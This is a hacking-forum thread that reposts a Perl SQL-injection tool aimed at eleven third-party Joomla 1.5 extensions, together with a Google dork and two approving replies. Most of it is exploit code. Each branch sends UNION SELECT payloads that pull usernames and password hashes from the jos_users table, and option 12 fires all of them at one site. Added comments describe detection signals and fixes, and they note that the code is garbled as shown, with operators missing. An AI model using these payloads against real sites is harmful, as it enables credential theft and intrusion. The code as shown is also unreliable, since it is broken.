Joomla 1.5.x Multi Component SQL Injector ()
#1
PHP Kod:
#Exploit Title: Joomla 1.5.x Multi Component SQL Injector ()
    #Exploit Author: D35m0nd142
    #Date: 28/01/2013
    #Google Dork: inurl:"com_..."
    #!/usr/bin/perl
    
# NOTE(review): this listing was damaged by the forum's code renderer. Operators
# are missing and statements are split across lines, so it does not compile as
# shown; read it as a record of what the tool does, not as runnable code.
# The "#!/usr/bin/perl" line above follows the header comments and is indented,
# so it is an ordinary comment and not an interpreter line.
# There is no "use strict" / "use warnings" in the visible listing; every
# variable below is an undeclared package global.
#
# IO::Socket::INET is loaded but no visible statement uses it; all traffic goes
# through LWP::UserAgent. HTTP::Request is used later without its own "use"
# line -- presumably it is pulled in by LWP::UserAgent; confirm.
use IO::Socket::INET;
    use 
LWP::UserAgent;
    
# Shells out to the external "clear" command just to wipe the terminal.
system("clear");
    print 
"---------------------------------------------\n";
    print 
"  Joomla 1.5.x Multi Component SQL Injector  \n";
    print 
"          Created by D35m0nd142              \n";
    print 
"---------------------------------------------\n\n";
    
# First command-line argument: base URL of the site; second: menu number 1-12.
# Neither value is validated beyond the empty-string test below.
$target $ARGV[0];
    
$component $ARGV[1];
    if(
$target eq '' || $component eq '')
    {
    # Usage text. The menu doubles as the list of third-party Joomla extensions
    # this tool targets, i.e. the "option=com_..." values a site owner can
    # search for in web-server access logs and in the installed-extension list.
    print 
"Usage: ./exploit.pl <target> <component> \n";
    print 
"-----------------------------------\n";
    print 
" Available components :        \n";
    print 
" 1- com_alfurqan15x            \n";
    print 
" 2- com_jobprofile             \n";
    print 
" 3- com_question               \n";
    print 
" 4- com_joomloc                \n";
    print 
" 5- com_joomlub               \n";
    print 
" 6- com_manager                \n";
    print 
" 7- com_iproperty              \n";
    print 
" 8- com_jooproperty               \n";
    print 
" 9- com_digifolio                 \n";
    print 
" 10- com_rdautos                   \n";
    print 
" 11- com_ownbiblio                \n";
    print 
" 12- try to exploit all components \n";
    print 
"-----------------------------------\n";
    print 
" Example: ./exploit.pl http://www.site.com/spa/ 1 \n\n";
    # Non-zero exit status signals the missing-argument case to the caller.
    exit(
1);
    }
     
    
# Bareword handle with the mode embedded in the file name (two-argument form):
# this creates or truncates "contents11.txt" in the current directory. The
# return value is not checked, and no visible statement ever writes to or
# closes FILE, so the only effect is an empty file left behind.
open(FILE"> contents11.txt");
     
    # Unanchored substring test: "http://" is prepended whenever that literal
    # text does not occur anywhere in the argument.
    if(
$target !~ /http:\/\//)
    
{
    
$target "http://$target";
    }
     
    
# Perl's built-in sleep takes whole seconds; the fractional part is dropped
# because Time::HiRes is not imported.
sleep 1.5;
    
$agent LWP::UserAgent->new();
    
# Fixed User-Agent claiming Firefox 7.0.1 on Windows instead of the libwww-perl
# default. For defenders this exact string, seen together with UNION SELECT text
# in the query string, is a usable log indicator for this tool.
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
    # Menu entry 1. "==" compares numerically, so a non-numeric second argument
    # evaluates as 0 and matches none of the component branches.
    #
    # Every per-component branch in this file follows the same three steps:
    #   1. build a URL whose request parameter carries a UNION SELECT reading
    #      username and password from the Joomla users table (jos_users),
    #   2. send one GET request,
    #   3. search the response body for a 32-character hex string.
    # Defender view: the request is visible in access logs as the component's
    # "option=" value plus "UNION" / "jos_users" in the query string. The durable
    # fix is in the extension (cast or bind the numeric parameter) or removing
    # it; any hash that left the server means those credentials must be rotated.
    if(
$component == 1)
    {
    
$host $target "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+fro​m+jos_users--";
    print 
" . . Exploiting com_alfurqan15x on target $target . . \n\n";
    
sleep 1;
    
# $req receives the response object; its status code is never inspected, so
# error pages and redirects are scanned exactly like a normal page.
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    # The pattern accepts the first run of 32 hex digits anywhere in the body
    # (the length of an MD5 digest). Nothing ties the match to the injected
    # column, so a "found" message is not proof that the query was injectable.
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password \n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 2)
    {
    
$host $target "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_us​ers--";
    print 
" . . Exploiting com_jobprofile on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 3)
    {
    
$host $target "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
    print 
" . . Exploiting com_question on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 4)
    {
    
$host $target "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1​8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,​45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
    print 
" . . Exploiting com_joomloc on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    # Menu entry 5. Unlike the single-request branches, this one prepares five
    # variants of the same request against the "aid" parameter of com_joomlub
    # (different encodings, letter case and trailing comment markers) and sends
    # them all in sequence.
    # Defender view: this shows up as a short burst of five near-identical GETs
    # for option=com_joomlub ... task=edit from one client, a second or two
    # apart, which is a better detection signal than any single request.
    if(
$component == 5)
    {
    print 
" . . Exploiting com_joomlub on target $target . . \n\n";
    
sleep 1;
    print 
" . . Trying different types of injection for this component . . wait please . . \n\n";
    
$host $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host1 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host2 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
    
$host3 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,u​sername,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25​,26,27,28,29+from+jos_users--%20";
    
$host4$target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
     
    # Collect the five variants so one loop can send them in order.
    @
hosts = ($host,$host1,$host2,$host3,$host4);
    # The loop has no "last": all five requests are sent even after a match,
    # and a result line is printed for each variant separately.
    foreach 
$hos(@hosts)
    {
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$hos));
    
$content $req->content;
    # Same success test as the other branches: any 32-hex-digit run in the
    # response body counts, whether or not it came from the users table.
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"Password found --> $password :) . \n\n";
    
sleep 1;
    }
    else
    {
    print 
"Password not found :( . \n\n";
    
sleep 1;
    }
    }
    }
     
    if(
$component == 6)
    {
    
$host $target "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_manager on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 7)
    {
    
$host $target "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_iproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 8)
    {
    
$host $target "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
    print 
" . . Exploiting com_jooproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 9)
    {
    
$host $target"/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17​/**/from/**/jos_users--";
    print 
" . . Exploiting com_digifolio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 10)
    {
    
$host $target "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
    print 
" . . Exploiting com_rdautos on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 11)
    {
    
$host $target"/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,1​2,13,14,15,16+from+jos_users--";
    print 
" . . Exploiting com_ownbiblio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 12)
    {
    print 
" . . Trying to exploit all available components . . \n\n";
    
sleep 2;
    
$host $target "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+fro​m+jos_users--";
    print 
" . . Exploiting com_alfurqan15x on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password \n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_us​ers--";
    print 
" . . Exploiting com_jobprofile on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
    print 
" . . Exploiting com_question on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1​8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,​45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
    print 
" . . Exploiting com_joomloc on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    print 
" . . Exploiting com_joomlub on target $target . . \n\n";
    
sleep 1;
    print 
" . . Trying different types of injection for this component . . wait please . . \n\n";
    
$host $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host1 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host2 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
    
$host3 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,u​sername,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25​,26,27,28,29+from+jos_users--%20";
    
$host4$target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
     
    @
hosts = ($host,$host1,$host2,$host3,$host4);
    foreach 
$hos(@hosts)
    {
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$hos));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"Password found --> $password :) . \n\n";
    
sleep 1;
    }
    else
    {
    print 
"Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_manager on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_iproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
    print 
" . . Exploiting com_jooproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target"/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17​/**/from/**/jos_users--";
    print 
" . . Exploiting com_digifolio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
    print 
" . . Exploiting com_rdautos on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target"/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,1​2,13,14,15,16+from+jos_users--";
    print 
" . . Exploiting com_ownbiblio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    print 
"[+] Attack finished. \n\n";
     
    } 


Not: Alıntıdır.
#2
Bu Çok güzel bir script. Yabancıda Gelmedi. Paylaşım için Teşekkürler.
#3
(02-06-2014, Saat: 19:44)Beyaz_Hacker Adlı Kullanıcıdan Alıntı:
Bu Çok güzel bir script. Yabancıda Gelmedi. Paylaşım için Teşekkürler.

Ewet exciting
